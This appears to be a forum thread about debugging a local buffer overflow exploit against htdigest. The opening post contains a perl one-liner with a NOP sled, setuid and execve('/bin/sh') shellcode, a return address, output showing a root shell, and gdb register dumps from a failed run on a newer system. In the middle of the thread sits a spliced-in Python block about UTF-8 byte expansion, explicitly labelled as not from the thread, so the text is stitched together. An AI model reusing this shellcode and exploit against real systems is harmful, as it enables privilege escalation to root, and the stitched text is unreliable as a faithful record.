Where's my extra byte coming from? - HeapOverflow Computer Security Community & Forums


h3llfyr3
28-10-05, 14:40
I've been working on an exploit; it works great on RH7.3:

[root@localhost root]# htdigest -c file `perl -e 'print "\x90"x343 .
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\$
. "\xaa\xaa\xaa\xaa" . "\xf0\xfa\xff\xbf"'` user
Adding password for user in realm 1Û1À°Íë[1ÀCC
°
S
Íèåÿÿÿ/bin/shªªªªðúÿ¿.
New password:
Re-type new password:
sh-2.05a# exit

but when run on RH9 (same command, just trying to overwrite EIP so I know where to go ;) ). Now I note that it's printing out the char, not nothing (a nop), and it adds an extra byte into the nopsled and the aaaa's.
note esi 0xc290c290
and eip 0xc2aac2aa so WTF is c2 coming from??


[root@localhost bin]# ./htdigest -c file ` perl -e 'print "\x90"x195 . "\xaa\xaa\xaa\xaa"'`
user
Adding password for user in realm
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
#0 0xc2aac2aa in ?? ()
(gdb) i r
eax 0x1 1
ecx 0x8050d28 134548776
edx 0x22d9 8921
ebx 0xc290c290 -1030700400
esp 0xbfffe4d0 0xbfffe4d0
ebp 0xc2aac290 0xc2aac290
esi 0xc290c290 -1030700400
edi 0xc290c290 -1030700400
eip 0xc2aac2aa 0xc2aac2aa
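The 0xc2 bytes in those registers look like Latin-1 bytes that were transcoded to UTF-8 somewhere on the way to the target (0x90 becomes c2 90, 0xaa becomes c2 aa, so every byte from 0x80 upwards doubles); whether a UTF-8 locale did exactly that on this RH9 box is an assumption. Added example, not from the thread: it shows the expansion and maps the register values in the gdb output above back to the bytes that went in.

```python
import struct


def utf8_expand(raw: bytes) -> bytes:
    """What a byte string looks like after Latin-1 -> UTF-8 transcoding.

    Bytes below 0x80 pass through unchanged; 0x80-0xBF come out as 0xC2 followed
    by the byte itself; 0xC0-0xFF come out as 0xC3 followed by (byte - 0x40).
    Every high byte in the input therefore becomes two bytes on output.
    """
    return raw.decode("latin-1").encode("utf-8")


def recover_window(value: int) -> bytes:
    """Map a 32-bit register value back to the bytes emitted before transcoding.

    The 4-byte window into memory may start in the middle of a two-byte sequence
    and may end on a lead byte, so it is decoded by hand; bytes.decode('utf-8')
    would raise on those cut sequences.
    """
    window = struct.pack("<I", value)  # little-endian: 0xc2aac2aa is aa c2 aa c2 in memory
    out = bytearray()
    i = 0
    while i < len(window):
        b = window[i]
        if b in (0xC2, 0xC3):
            if i + 1 == len(window):
                break  # lead byte cut off at the window end; its continuation lies beyond
            out.append(window[i + 1] + (0x40 if b == 0xC3 else 0))
            i += 2
        else:
            # ASCII byte, or a continuation byte whose lead byte lies before the window.
            # For a lone continuation byte the original was b (lead 0xC2) or b + 0x40
            # (lead 0xC3); 0xC2 is assumed, which is right for 0x80-0xBF originals
            # such as 0x90 and 0xaa.
            out.append(b)
            i += 1
    return bytes(out)


def expansion_ratio(raw: bytes) -> float:
    """How much longer the argument gets after transcoding (2.0 for all-high bytes)."""
    return len(utf8_expand(raw)) / len(raw)


if __name__ == "__main__":
    # Constructed sample: the 195-byte sled plus the 4-byte marker from the post.
    arg = b"\x90" * 195 + b"\xaa" * 4
    print(len(arg), "->", len(utf8_expand(arg)), "bytes after transcoding")
    for reg, val in (("ebx", 0xC290C290), ("ebp", 0xC2AAC290), ("eip", 0xC2AAC2AA)):
        print(reg, hex(val), "held only", recover_window(val).hex(), "of the input")
```

Each 32-bit register holds just two of the original bytes, and ebp sits on the boundary between the sled and the marker, which is why the marker does not land in eip at the expected offset.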

13-12-05, 03:35
WOW how exciting!:(

0x0804
11-04-06, 18:04
Which version of gcc are you using? I guess since gcc 2.5 onwards they introduced something called padding. It makes it harder to get the exploit working. Either you can disable it, or I would suggest you keep increasing until you completely overwrite the EIP. I have encountered padding of more than 64 bytes. It's quite annoying.